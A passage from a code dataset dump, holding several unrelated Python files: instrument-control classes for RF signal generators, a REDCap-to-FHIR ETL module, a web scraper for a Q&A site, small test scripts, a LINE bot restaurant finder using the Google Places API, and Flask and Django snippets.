Instrument.__init__(self, resource, write_termination='\\n', read_termination='\\n', timeout=20000)\n\n self.power_min, self.power_max = power_bounds\n self.freq_min, self.freq_max = freq_bounds\n\n def query_error(self):\n return self.inst.ask('SYST:ERR?')\n\n def query_power_condition(self):\n ans = int(self.inst.ask(\"STAT:QUES:COND?\"))\n\n if ans == 8:\n self.logger.warning(\"OUTPUT UNLEVELED\")\n elif ans > 0:\n self.logger.warning(\"DATA QUESTIONABLE CONDITION REGISTER IS NON-ZERO: %d\" % ans)\n\n return ans\n\n def output(self, on):\n if on:\n self.inst.write(\"OUTP:STAT ON\")\n self.logger.info(\"Output ON\")\n else:\n self.inst.write(\"OUTP:STAT OFF\")\n self.logger.info(\"Output OFF\")\n\n def set_freq_mode(self, mode):\n '''Set Frequency mode\n available values: FIXed CW SWEep\n LIST for HP83620B\n SWCW for HP83752A\n '''\n\n if mode.upper() not in self.FREQ_MODE:\n raise ValueError('invalid frequency mode.')\n\n self.inst.write(\"FREQ:MODE \" + mode)\n\n def set_power_mode(self, mode):\n '''Set Power mode\n available values: FIXed SWEep\n '''\n\n if mode.upper() not in self.POWER_MODE:\n raise ValueError('invalid power mode.')\n\n self.inst.write(\"POW:MODE \" + mode)\n\n def set_sweep_generation(self, stepped=True):\n '''Set sweep generation type.\n if stepped is True stepped sweep.\n else analog sweep.\n '''\n\n if stepped:\n self.inst.write('SWE:GEN STEP')\n else:\n self.inst.write('SWE:GEN ANAL')\n\n def parse_freq(self, freq):\n \"\"\"Parse frequency.\n\n Frequency may be passed as string (e.g. '100 MHz') or number (1.0E8).\n The value is checked only if a number is passed.\n \"\"\"\n\n if isinstance(freq, str):\n return freq\n elif isinstance(freq, float) or isinstance(freq, int):\n if freq < self.freq_min or freq > self.freq_max:\n raise ValueError('Invalid frequency.')\n return '%.12E' % freq\n else:\n raise TypeError('Invalid frequency value type.')\n\n def set_freq_CW(self, freq):\n self.inst.write(\"FREQ %s\" % self.parse_freq(freq))\n\n def set_freq_range(self, start, stop):\n self.inst.write('FREQ:STAR %s;STOP %s' %\n (self.parse_freq(start), self.parse_freq(stop)))\n\n def set_power(self, power):\n #print(power)\n if power < self.power_min or power > self.power_max:\n raise ValueError('Invalid power.')\n\n self.inst.write(\"POW %.3f dBm\" % power)\n\n def set_init_cont(self, on=True):\n if on:\n self.inst.write(\"INIT:CONT ON\")\n else:\n self.inst.write(\"INIT:CONT OFF\")\n\n def initiate(self):\n self.inst.write('INIT')\n\n def abort(self):\n self.inst.write('ABOR')\n\n def trigger(self):\n self.inst.write('TRIG')\n\n def set_trig_source(self, source):\n if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'HOLD'):\n raise ValueError('invalid trigger source.')\n self.inst.write('TRIG:SOUR %s' % source)\n\n def set_sweep_trig_source(self, source):\n '''Set the stepped sweep point-to-point trigger source.\n This only applies when SWEep:GEN is set to STEPped.\n '''\n\n if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'HOLD'):\n raise ValueError('invalid sweep trigger source.')\n self.inst.write('SWE:TRIG:SOUR %s' % source)\n\n def set_sweep_points(self, num):\n self.inst.write('SWE:POIN %d' % num)\n\n def setup_CW(self, freq, power):\n \"\"\"Setting Continuous Wave output\"\"\"\n\n #self.rst() 20180801 一旦OFF、これを入れると、SweepMW3の掃引が途中でとても遅くなるらしい。\n\n self.set_freq_mode(\"CW\")\n self.set_power_mode(\"FIX\")\n\n self.set_freq_CW(freq)\n self.set_power(power)\n\n def setup_freq_sweep(self, start, stop, num, power, start_trig='EXT', sweep_trig='EXT'):\n '''Convenient function to set up triggered frequency sweep.\n\n sweep can be initiated by calling initiate() or set_init_cont(True)\n after this function. output(True) should be called before initiation\n if you want actual RF output.\n '''\n\n self.rst()\n self.set_freq_mode(self.SWEEP_MODE)\n self.set_power_mode('FIX')\n self.set_sweep_generation(stepped=True)\n\n self.set_trig_source(start_trig)\n self.set_sweep_trig_source(sweep_trig)\n\n self.set_freq_range(start, stop)\n self.set_sweep_points(num)\n self.set_power(power)\n\n\nclass N5182B(HP_SG):\n FREQ_MODE = ('FIXED', 'FIX', 'CW', 'LIST')\n SWEEP_MODE = 'LIST'\n\n POWER_MODE = ('FIXED', 'FIX', 'LIST')\n\n def set_list_type(self, stepped=True):\n if stepped:\n self.inst.write('LIST:TYPE STEP')\n else:\n self.inst.write('LIST:TYPE LIST')\n\n def set_route_trig_out(self, ch, route):\n if ch not in (1, 2):\n raise ValueError('invalid output channel')\n if route.upper() not in ('SWE', 'SWEEP', 'SETT', 'SETTLED', 'PVID', 'PVIDEO',\n 'PSYN', 'PSYNC', 'LXI', 'PULS', 'PULSE', 'TRIG', 'TRIGGER1', 'TRIGGER2', 'SFDone', 'NONE'):\n raise ValueError('invalid output route')\n\n self.inst.write('ROUT:TRIG%d:OUTP %s' % (ch, route))\n\n def set_trig_source(self, source, ext='TRIGGER1'):\n if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'INT', 'INTERNAL', 'KEY', 'TIM', 'TIMER', 'MAN', 'MANUAL'):\n raise ValueError('invalid trigger source.')\n self.inst.write('TRIG:SOUR %s' % source)\n\n if ext.upper() not in ('TRIG1', 'TRIGGER1', 'TRIG2', 'TRIGGER2', 'PULS', 'PULSE'):\n raise ValueError('invalid external trigger source')\n self.inst.write('TRIG:EXT:SOUR %s' % ext)\n\n def set_sweep_trig_source(self, source, ext='TRIGGER1'):\n '''Set the stepped sweep point-to-point trigger source.\n This only applies when SWEep:GEN is set to STEPped.\n '''\n\n if source.upper() not in ('IMM', 'IMMEDIATE', 'BUS', 'EXT', 'EXTERNAL', 'INT', 'INTERNAL', 'KEY', 'TIM', 'TIMER', 'MAN', 'MANUAL'):\n raise ValueError('invalid sweep trigger source.')\n self.inst.write('LIST:TRIG:SOUR %s' % source)\n\n if ext.upper() not in ('TRIG1', 'TRIGGER1', 'TRIG2', 'TRIGGER2', 'PULS', 'PULSE'):\n raise ValueError('invalid external trigger source')\n self.inst.write('LIST:TRIG:EXT:SOUR %s' % ext)\n\n def set_dm_source(self, source):\n \"\"\"Set digital (IQ) moduration source.\n By default (on RST*), INTernal is selected.\n \"\"\"\n\n if source.upper() not in ('EXT', 'EXTERNAL', 'INT', 'INTERNAL', 'SUM'):\n raise ValueError('invalid digital modulation source')\n self.inst.write(':DM:SOUR %s' % source)\n\n def set_dm_invert(self, invert):\n \"\"\"Set digital (IQ) modulation polarity.\n If invert is True, Q signal is inverted.\n This will work only for internally generated I/Q signal.\n (NOT for external signal!)\n\n By default (on RST*), polarity is not inverted.\n \"\"\"\n\n if invert:\n self.inst.write(':DM:POL INV')\n else:\n self.inst.write(':DM:POL NORM')\n\n def set_FMparam(self, modFreq, divFreq, path=1):\n \"\"\"\n set parameter for FM.\n \"\"\"\n # Sets FM path 1or2 to internal at a modulation rate of modFreq Hz\n self.inst.write('FM'+str(path)+':INT:FREQ '+str(modFreq)+' Hz') \n # Sets FM path 1or2 modulation deviation rate of divFreq kHz\n self.inst.write('FM'+str(path)+':DEV '+str(divFreq)+' Hz')\n\n\n def dm(self, on):\n \"\"\"If on is True turn on digital modulation.\"\"\"\n\n if on:\n self.inst.write(':DM:STAT ON')\n self.logger.info('Digital modulation ON.')\n else:\n self.inst.write(':DM:STAT OFF')\n self.logger.info('Digital modulation OFF.')\n\n def setup_freq_sweep(self, start, stop, num, power, start_trig='EXT', sweep_trig='EXT', ext_trig='TRIGGER1', sweep_out=2):\n '''Convenient function to set up triggered frequency sweep.\n\n sweep can be initiated by calling initiate() or set_init_cont(True)\n after this function. output(True) should be called before initiation\n if you want actual RF output.\n\n set_list_type is added.\n '''\n\n self.rst()\n self.set_freq_mode(self.SWEEP_MODE)\n self.set_power_mode('FIX')\n self.set_sweep_generation(stepped=True)\n\n self.set_trig_source(start_trig)\n self.set_sweep_trig_source(sweep_trig)\n\n self.set_list_type(stepped=True) # This is not in the default implementation.\n self.set_route_trig_out(sweep_out, 'SETT') # This is not in the default implementation.\n\n self.set_freq_range(start, stop)\n self.set_sweep_points(num)\n self.set_power(power)\n\n def swich_FM(self, onoff, ch=1):\n stateDict = {'1':'ON', '0':'OFF', 'True':'ON', 'False':'OFF'}\n self.inst.write('FM'+str(ch)+':STAT '+stateDict[str(onoff)])\n \n \nclass HP83620B(HP_SG):\n '''Class for 83620B\n '''\n\n FREQ_MODE = ('FIXED', 'FIX', 'CW', 'SWEEP', 'SWE', 'LIST')\n SWEEP_MODE = 'SWE'\n\n def __init__(self, resource, power_bounds=(-110.0, 25.0)):\n if power_bounds[0] < -110.0 or power_bounds[1] > 25.0:\n raise ValueError('Invalid power bounds.')\n HP_SG.__init__(self, resource, power_bounds)\n\n def output(self, on):\n if on:\n self.inst.write(\"POW:STAT ON\")\n self.logger.info(\"Output ON\")\n else:\n self.inst.write(\"POW:STAT OFF\")\n self.logger.info(\"Output OFF\")\n\n def pulse(self, on):\n if on:\n self.inst.write(\"PULS:STAT ON\")\n self.logger.info(\"Pulse ON\")\n else:\n self.inst.write(\"PULS:STAT OFF\")\n self.logger.info(\"Pulse OFF\")\n\n\nclass HP83752A(HP_SG):\n '''Class for 83752A\n '''\n\n FREQ_MODE = ('FIXED', 'FIX', 'CW', 'SWEEP', 'SWE', 'SWCW')\n SWEEP_MODE = 'SWE'\n\n def __init__(self, resource, power_bounds=(-15.0, 20.0)):\n if power_bounds[0] < -15.0 or power_bounds[1] > 20.0:\n raise ValueError('Invalid power bounds.')\n HP_SG.__init__(self, resource, power_bounds)\n\n # Sweep related specific functions\n\n def sweep_trigger(self):\n 'Send immediate point to point event in step sweep mode.'\n self.inst.write('SWE:POIN:TRIG')\n\n def double_trigger(self):\n 'Send sweep start trigger and immediate point to point trigger.'\n self.inst.write('TRIG;SWE:POIN:TRIG')\n\n def set_sweep_freq_step(self, num):\n '''either set_sweep_points() or this function should be enough.\n\n Maybe this function should not be used because setting step raises an error in instrument.\n See programming manual p. 2-69.\n '''\n\n self.inst.write('SWE:STEP %d' % num)\n\n def set_sweep_pow_step(self, num):\n '''either set_sweep_points() or this function should be enough.\n\n Maybe this function should not be used because setting step raises an error in instrument.\n See programming manual p. 2-68.\n '''\n\n self.inst.write('SWE:POW:STEP %d' % num)\n\n\ndef main():\n return\n\nif __name__ == '__main__':\n main()\n","sub_path":"CUI/Inst/sg.py","file_name":"sg.py","file_ext":"py","file_size_in_byte":13713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"549971685","text":"\"\"\"\nProcess REDCap DET notifications.\n\nThis command group supports custom ETL routines specific to a project in\nREDCap.\n\"\"\"\nimport os\nimport click\nimport logging\nfrom datetime import datetime, timezone\nfrom functools import wraps\nfrom typing import Callable, Iterable, Optional, Tuple\nfrom urllib.parse import urljoin\nfrom id3c.cli.command import with_database_session\nfrom id3c.cli.redcap import CachedProject, is_complete\nfrom id3c.db.session import DatabaseSession\nfrom id3c.db.datatypes import as_json, Json\nfrom id3c.cli.command.geocode import pickled_cache\nfrom . import etl\n\n\nLOG = logging.getLogger(__name__)\n\n\n# XXX FIXME: I don't think we should hardcode a cache name like this,\n# particularly with a name that doesn't give any hint as to what uses it or\n# what it contains. The `id3c geocode` command, for instance, explicitly\n# parameterizes the cache file as an option.\n#\n# Going a step further, I don't think @command_for_project should even be\n# providing the \"cache\" parameter. What is cached and where it is stored is\n# something specific to each REDCap DET routine, not a global invariant.\n# -trs, 19 Dec 2019\nCACHE_FILE = 'cache.pickle'\n\n\n@etl.group(\"redcap-det\", help = __doc__)\ndef redcap_det():\n pass\n\n\ndef command_for_project(name: str,\n redcap_url: str,\n project_id: int,\n revision: int,\n required_instruments: Iterable[str] = [],\n include_incomplete: bool = False,\n raw_coded_values: bool = False,\n **kwargs) -> Callable[[Callable], click.Command]:\n \"\"\"\n Decorator to create REDCap DET ETL subcommands.\n\n The decorated function should be an ETL routine for an individual DET and\n REDCap record pair. It must take take two dictionaries, *det* and\n *redcap_record*, as arguments. The function must return another dictionary\n which represents a FHIR document to insert into ``receiving.fhir``. If no\n FHIR document is appropriate, the function should return ``None``.\n\n *name* is the name of the ETL command, which will be invokable as ``id3c\n etl redcap-det <name>``. *name* is also used in the processing log for\n each DET.\n\n *redcap_url* and *project_id* are used to select DETs for processing from\n ``receiving.redcap_det``. They will also be used to make requests to the\n appropriate REDCap web API.\n\n *required_instruments* is an optional list of REDCap instrument names which\n are required for the decorated routine to run.\n\n *revision* is an integer specifying the version of the routine. If it\n increments, previously processed DETs will be re-processed by the new\n version of the routine.\n\n *raw_coded_values* is a boolean specifying if raw coded values are returned\n for multiple choice answers. When false (default), the entire string labels\n are returned.\n \"\"\"\n etl_id = {\n \"etl\": f\"redcap-det {name}\",\n \"revision\": revision,\n }\n\n det_contains = {\n \"redcap_url\": redcap_url,\n \"project_id\": str(project_id), # REDCap DETs send project_id as a string\n }\n\n def decorator(routine: Callable[..., Optional[dict]]) -> click.Command:\n @click.option(\"--log-output/--no-output\",\n help = \"Write the output FHIR documents to stdout. You will likely want to redirect this to a file\",\n default = False)\n\n @redcap_det.command(name, **kwargs)\n @with_database_session\n @wraps(routine)\n\n def decorated(*args, db: DatabaseSession, log_output: bool, **kwargs):\n LOG.debug(f\"Starting the REDCap DET ETL routine {name}, revision {revision}\")\n\n redcap_det = db.cursor(f\"redcap-det {name}\")\n redcap_det.execute(\"\"\"\n select redcap_det_id as id, document\n from receiving.redcap_det\n where not processing_log @> %s\n and document::jsonb @> %s\n order by id\n for update\n \"\"\", (Json([etl_id]), Json(det_contains)))\n\n with pickled_cache(CACHE_FILE) as cache:\n for det in redcap_det:\n with db.savepoint(f\"redcap_det {det.id}\"):\n LOG.info(f\"Processing REDCap DET {det.id}\")\n\n instrument = det.document['instrument']\n\n # Only pull REDCap record if\n # `include_incomplete` flag was not included and\n # the current instrument is complete\n if not include_incomplete and not is_complete(instrument, det.document):\n LOG.debug(f\"Skipping incomplete or unverified REDCap DET {det.id}\")\n mark_skipped(db, det.id, etl_id)\n continue\n\n redcap_record = get_redcap_record_from_det(det.document, raw_coded_values)\n\n if not redcap_record:\n LOG.debug(f\"REDCap record is missing or invalid. Skipping REDCap DET {det.id}\")\n mark_skipped(db, det.id, etl_id)\n continue\n\n # Only process REDCap record if all required instruments are complete\n incomplete_instruments = {\n instrument\n for instrument\n in required_instruments\n if not is_complete(instrument, redcap_record)\n }\n\n if incomplete_instruments:\n LOG.debug(f\"The following required instruments «{incomplete_instruments}» are not yet marked complete. \" + \\\n f\"Skipping REDCap DET {det.id}\")\n mark_skipped(db, det.id, etl_id)\n continue\n\n bundle = routine(db = db, cache = cache, det = det, redcap_record = redcap_record)\n\n if not bundle:\n mark_skipped(db, det.id, etl_id)\n continue\n\n if log_output:\n print(as_json(bundle))\n\n insert_fhir_bundle(db, bundle)\n mark_loaded(db, det.id, etl_id, bundle['id'])\n\n\n\n return decorated\n return decorator\n\n\ndef get_redcap_record_from_det(det: dict, raw: bool) -> Optional[dict]:\n \"\"\"\n Fetch the REDCap record for the given *det* notification.\n\n The *raw* parameter indicates whether to pull the raw coded values or labels\n for multiple choice answers.\n\n The DET's ``redcap_url``, ``project_id``, and ``record`` fields are used to\n make the API call.\n\n All instruments will be fetched.\n \"\"\"\n api_url = urljoin(det[\"redcap_url\"], \"api/\")\n api_token = get_redcap_api_token(api_url)\n\n project_id = int(det[\"project_id\"])\n\n try:\n record_id = str(det[\"record\"])\n except ValueError:\n return None\n\n LOG.info(f\"Fetching REDCap record {record_id}\")\n\n project = CachedProject(api_url, api_token, project_id)\n record = project.record(record_id, raw = raw)\n\n # XXX TODO: Handle records with repeating instruments or longitudinal\n # events.\n return record[0] if record else None\n\n\ndef get_redcap_api_token(api_url: str) -> str:\n \"\"\"\n Returns the authentication token configured for use with the REDCap web API\n endpoint *api_url*.\n\n Requires the environmental variables ``REDCAP_API_URL`` and\n ``REDCAP_API_TOKEN``. ``REDCAP_API_URL`` must match the provided *api_url*\n as a safety check.\n \"\"\"\n url = os.environ.get(\"REDCAP_API_URL\")\n token = os.environ.get(\"REDCAP_API_TOKEN\")\n\n if not url and not token:\n raise Exception(f\"The environment variables REDCAP_API_URL and REDCAP_API_TOKEN are required.\")\n elif not url:\n raise Exception(f\"The environment variable REDCAP_API_URL is required.\")\n elif not token:\n raise Exception(f\"The environment variable REDCAP_API_TOKEN is required.\")\n\n # This comparison may need URL canonicalization in the future.\n if url != api_url:\n raise Exception(f\"The environment variable REDCAP_API_URL does not match the requested API endpoint «{api_url}»\")\n\n return token\n\n\ndef insert_fhir_bundle(db: DatabaseSession, bundle: dict) -> None:\n \"\"\"\n Insert FHIR bundles into the receiving area of the database.\n \"\"\"\n LOG.debug(f\"Inserting FHIR bundle «{bundle['id']}»\")\n\n fhir = db.fetch_row(\"\"\"\n insert into receiving.fhir(document)\n values (%s)\n\n returning fhir_id as id\n \"\"\", (Json(bundle),))\n\n assert fhir.id, \"Insert affected no rows!\"\n\n LOG.info(f\"Inserted FHIR document {fhir.id} «{bundle['id']}»\")\n\n\ndef mark_loaded(db: DatabaseSession, det_id: int, etl_id: dict, bundle_uuid: str) -> None:\n LOG.debug(f\"Marking REDCap DET record {det_id} as loaded\")\n mark_processed(db, det_id, {**etl_id, \"status\": \"loaded\", \"fhir_bundle_id\": bundle_uuid})\n\n\ndef mark_skipped(db: DatabaseSession, det_id: int, etl_id: dict) -> None:\n LOG.debug(f\"Marking REDCap DET record {det_id} as skipped\")\n mark_processed(db, det_id, {**etl_id, \"status\": \"skipped\"})\n\n\ndef mark_processed(db: DatabaseSession, det_id: int, entry = {}) -> None:\n LOG.debug(f\"Appending to processing log of REDCap DET record {det_id}\")\n\n data = {\n \"det_id\": det_id,\n \"log_entry\": Json({\n **entry,\n \"timestamp\": datetime.now(timezone.utc),\n }),\n }\n\n with db.cursor() as cursor:\n cursor.execute(\"\"\"\n update receiving.redcap_det\n set processing_log = processing_log || %(log_entry)s\n where redcap_det_id = %(det_id)s\n \"\"\", data)\n","sub_path":"lib/id3c/cli/command/etl/redcap_det.py","file_name":"redcap_det.py","file_ext":"py","file_size_in_byte":9922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"235821263","text":"# Copyright 2018 Figo Individual. All Rights Reserved.\nimport sqlite3 #数据模块\nfrom bs4 import BeautifulSoup #解析网址模块\nimport time #时间模块\nfrom datetime import datetime\nfrom selenium import webdriver #浏览器模块\nimport xlwt\n\nprint(\"请输入关键词,按Enter开始爬虫\")\nword=input() #手动输入关键词,如果你有固定的关键词可以替换成‘word='keyword'’\nurls='https://www.wukong.com/search/?keyword={}'.format(word) #关键词对应的网址\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--disable-gpu')\ndriv = webdriver.Chrome(chrome_options=chrome_options)\ndriv.get(urls) #在谷歌浏览器中打开网址\ndriv.set_page_load_timeout(30) #设定时间,然后捕获timeout异常\n\n#创建一个模拟滚动条滚动到页面底部函数\ndef scroll(driv): \n driv.execute_script(\"\"\" \n (function () { \n var y = document.body.scrollTop; \n var step = 100; \n window.scroll(0, y); \n \n \n function f() { \n if (y < document.body.scrollHeight) { \n y += step; \n window.scroll(0, y); \n setTimeout(f, 50); \n } \n else { \n window.scroll(0, y); \n document.title += \"scroll-done\"; \n } \n } \n \n \n setTimeout(f, 1000); \n })(); \n \"\"\")\nprint(\"开始模拟鼠标拉到文章底部\")\nb=0\nc=0\nwhile b<5: #设置循环,可替换这里值来选择你要滚动的次数\n scroll(driv) #滚动一次\n b=b+1\n print('拉动{}次'.format(b))\n c=c+3\n time.sleep(c) #休息c秒的时间\n \n#这个时候页面滚动了多次,是你最终需要解析的网页了\n\nworkbook = xlwt.Workbook(encoding='utf-8')\nworksheet1 = workbook.add_sheet(\"悟空问答\")\ntitle = ['序号','问题网址','关键词','问题','回答数','收藏数','获赞数','评论数']\nfor i in range(8):\n worksheet1.write(0, i, title[i])\n\nsoup = BeautifulSoup(driv.page_source, \"lxml\") #解析当前网页\na=1 \nfor li in soup.find_all('div',class_=\"question-v3\"):\n channels=word\n url='www.wukong.com'+li.a['href'] #每个文章的地址\n question=li.find('a',target=\"_blank\").text\n answer=li.find('span',class_=\"question-answer-num\").text\n follow=li.find('span',class_=\"question-follow-num\").text\n try: #捕获异常\n like=li.find('span',class_=\"like-num\").text #检验语句\n except BaseException: #异常类型\n like=0 #如果检验语句有异常,那么执行这一句\n else: #如果没有异常,那么执行下一句\n like=li.find('span',class_=\"like-num\").text \n try: #同上\n review=li.find('span',class_=\"comment-count\").text\n except BaseException:\n review=0\n else: \n review=li.find('span',class_=\"comment-count\").text\n \n one = (None,url,channels,question,answer,follow,like,review)\n \n if follow=='暂无收藏': #如果问题没人收藏,那么跳过该问题\n continue\n elif question=='': #如果问题没有文字,跳过该问题\n continue\n elif int(like)==0: #如果点赞人数为0,那么跳过该问题,在这里可以设置\n continue\n elif int(review)==0:\n continue\n elif a<50: #这里可以你需要爬取的问题的个数,如果已经爬取小于50个问题,那么爬下这个问题。\n print(\"正在爬取第{}篇文章\".format(a))\n for i in range(8):\n if i == 0:\n worksheet1.write(a, i, a)\n else:\n worksheet1.write(a, i, one[i])\n a=a+1\n \n else: #如果不满足以上条件,直接跳出循环,停止爬虫\n break\n \nworkbook.save(\"D:/xxx\" + datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + \".xls\")\nprint(\"抓完咯\")\nprint(\"关闭浏览器\")\ndriv.quit()","sub_path":"wukong/wukongToXLS.py","file_name":"wukongToXLS.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"542923185","text":"import os\nimport sys\nsys.path.append(os.popen('pwd').read().rstrip())\n\nfrom pyjenkins.functions.english_functions import *\n\nOPERATIONS_L = [\"pluralized\", \"singularized\", \"capitalized\", \"end sentence\"]\nFUNCTIONS_L = [make_plural, make_singular, capitalize, end_sentence]\nANSWERS_D = {\n \"pluralized\": {\n \"goat\": \"goats\",\n \"carrot\": \"carrots\",\n \"bone\": \"bones\",\n \"sword\": \"swords\"\n },\n \"singularized\": {\n \"characters\": \"character\",\n \"books\": \"book\",\n \"grails\": \"grail\",\n \"horses\": \"horse\"\n },\n \"capitalized\": {\n \"arthur\": \"Arthur\",\n \"jeremy\": \"Jeremy\",\n \"caesar\": \"Caesar\",\n \"waldo\": \"Waldo\"\n },\n \"end sentence\": {\n \"this is a sentence\": \"this is a sentence.\",\n \"i have to buy groceries today\": \"i have to buy groceries today.\",\n \"welcome to the jungle\": \"welcome to the jungle.\",\n \"what is the square root of pi\": \"what is the square root of pi.\"\n }\n}\n\nif __name__ == \"__main__\":\n for i in range(0,len(OPERATIONS_L)):\n op = OPERATIONS_L[i]\n func = FUNCTIONS_L[i]\n\n for answer_key in sorted(ANSWERS_D[op].keys()):\n func_val = func(answer_key)\n assert_val = ANSWERS_D[op][answer_key]\n print(\"%s: %s -> %s\" % (op, answer_key, assert_val))\n assert func_val == assert_val\n\n print(\"all english tests complete\")\n","sub_path":"tests/test_english.py","file_name":"test_english.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"337284955","text":"'''\nCreated on 2018年10月23日\n@author: Even\n\nFunction: All the eat (restaurant) information functions for Line\n'''\nimport requests\nimport random\nfrom datetime import datetime\n\nfrom linebot import LineBotApi, WebhookParser\nfrom linebot.exceptions import InvalidSignatureError, LineBotApiError\nfrom linebot.models import (\n TemplateSendMessage, TextSendMessage, ButtonsTemplate,\n ImageSendMessage, StickerSendMessage,\n MessageEvent, \n PostbackAction, MessageAction,\n URIAction, DatetimePickerAction,\n ConfirmTemplate, CarouselTemplate, CarouselColumn,\n ImageCarouselTemplate, ImageCarouselColumn, MessageTemplateAction,\n PostbackTemplateAction, URITemplateAction\n)\n\nfrom linebot.models.events import PostbackEvent\n\ndef Get_Eat(sGOOGLE_PLACES_API_KEY, sLat, sLng): # 尋找餐廳 => 傳入經緯度, 先緯後經 Hotel => lodging\n\n # 使用 Google API nearby search (每次只會回傳20筆資料, 如果要換頁要傳入next_page_token to pagetoken\n # rankby=distance&type=restaurant (餐廳) (回傳資料是 json) \n sUrl = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?key={}&location={},{}&rankby=distance&type=restaurant&language=zh-TW\".format(sGOOGLE_PLACES_API_KEY, sLat, sLng)\n sGoogleMap_results = requests.get(sUrl)\n\n print (\"sUrl => \",sUrl) \n #print (\"sGoogleMap_results => \",sGoogleMap_results) \n # json 轉 dictionary 再轉 list\n dictGoogleMap_results = sGoogleMap_results.json()\n # 判斷回傳的資料是否正確\n print (\"Eat Google json search result => \",str(dictGoogleMap_results[\"status\"]))\n \n # for line message\n sMsg_Img_url=[]\n sMsg_Title=[]\n sMsg_Text=[]\n sMsg_uri=[]\n # status OK 代表 Google 有正常運作\n if dictGoogleMap_results[\"status\"]=='OK' :\n listRestaurants = dictGoogleMap_results[\"results\"]\n \n # 篩選評分 rating\n dStarttime = datetime.now()\n # 列表解析法\n listRestaurants_Filter = [item for item in listRestaurants if float(item.get(\"rating\",0)) >= 4.2]\n print (\"listRestaurants_Filter => Count:\"+str(len(listRestaurants_Filter))+\" => \"+str(listRestaurants_Filter))\n \n # 若符合條件的數量 >= 5 , 就隨機挑選5 間餐廳, 且不重覆, 否則就全部顯示\n if len(listRestaurants_Filter)>=1 :\n listRestaurant_Random = random.sample(listRestaurants_Filter,min(5,len(listRestaurants_Filter)))\n # 開始組合相關資訊\n for Restaurant in listRestaurant_Random:\n \n # 檢查餐廳有沒有照片,有的話會顯示\n if Restaurant.get(\"photos\") is None:\n # 用沒有照片的照片替代\n sMsg_Img_url.append('https://developers.google.com/maps/documentation/maps-static/images/quota.png')\n else:\n # 只取一張照片\n sPhoto_reference = Restaurant[\"photos\"][0][\"photo_reference\"]\n sMsg_Img_url.append(\"https://maps.googleapis.com/maps/api/place/photo?key={}&photoreference={}&maxwidth=400\".format(sGOOGLE_PLACES_API_KEY, sPhoto_reference))\n \n # 名稱跟評分\n sMsg_Title.append(Restaurant.get(\"name\",\"\"))\n # 地址\n sMsg_Text.append('Rate:'+str(Restaurant.get(\"rating\",\"\"))+'\\n'+Restaurant.get(\"vicinity\",\"\"))\n \n # 取得餐廳的 Google map 網址\n sRestaurant_url = \"https://www.google.com/maps/search/?api=1&query={res_lat},{res_lng}&query_place_id={res_place_id}\".format(\n res_lat=Restaurant[\"geometry\"][\"location\"][\"lat\"],\n res_lng=Restaurant[\"geometry\"][\"location\"][\"lng\"],\n res_place_id=Restaurant[\"place_id\"]\n )\n sMsg_uri.append(sRestaurant_url)\n else :\n listRestaurant_Random = None\n \n dEndtime = datetime.now()\n # 記錄運行時間 \n print(\"Nearby restaurants filter using %.6f sec\"%(float((dEndtime-dStarttime).microseconds)/1000000))\n \n print(\"sMsg_Img_url:\",sMsg_Img_url,\"\\n\" \\\n \"sMsg_Title:\",sMsg_Title,\"\\n\" \\\n \"sMsg_Text:\",sMsg_Text,\"\\n\" \\\n \"sMsg_uri:\",sMsg_uri,\"\\n\" \\\n )\n \n if len(sMsg_Title)<=0 :\n sText = \"抱歉!! 找不到足夠的資料!!\\n\" \\\n \"Sorry, Can't find enough data!!\" \n Msg_Template = TextSendMessage(text=sText) \n else :\n # 回覆使用旋轉木馬式\n Msg_Template = TemplateSendMessage(\n alt_text='Nearby restaurants search',\n template=CarouselTemplate(\n columns=None\n )\n )\n \n for i in range(0, min(len(sMsg_Title),10)):\n Msg_Template.template.columns.append(\n CarouselColumn(\n thumbnail_image_url=sMsg_Img_url[i],\n title=sMsg_Title[i][:40],\n text=sMsg_Text[i][:60],\n actions=[\n URIAction(\n label='Show map (看地圖)',\n uri=sMsg_uri[i]\n ) \n ]\n )\n )\n \n \n return Msg_Template\n","sub_path":"HelloWorld/LineFunctions/LineFunctions_Eat.py","file_name":"LineFunctions_Eat.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"332962170","text":"from flask import Flask, flash, redirect, render_template, request, jsonify\n\nfrom .core import Article\nfrom .join import aff_contrib_inner_join\n\n\napp = Flask(__name__)\napp.secret_key = \"C(*JD@J(*HS@S)S(\"\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef upload_file():\n if request.method == \"POST\":\n try:\n xml_file = request.files[\"xml_file\"]\n except KeyError:\n flash(\"Missing xml_file input\")\n return redirect(request.url)\n try:\n article = Article(xml_file)\n except:\n flash(\"Error: can't load the given file\")\n return redirect(request.url)\n return jsonify(aff_contrib_inner_join(article))\n return render_template(\"upload.html\")\n","sub_path":"clea/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"8859552","text":"from django.conf.urls import url\n\nfrom . import views\napp_name = 'polls'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^lgoin_view$', views.lgoin_view, name='lgoin_view'),\n url(r'^logout_view$', views.logout_view, name='logout_view'),\n url(r'^my_view$', views.my_view, name='my_view'),\n\n\n\n url(r'^(?P<question_id>[0-9]+)/$', views.detail, name='detail'),\n url(r'^(?P<question_id>[0-9]+)/results/$', views.results, name='results'),\n url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, 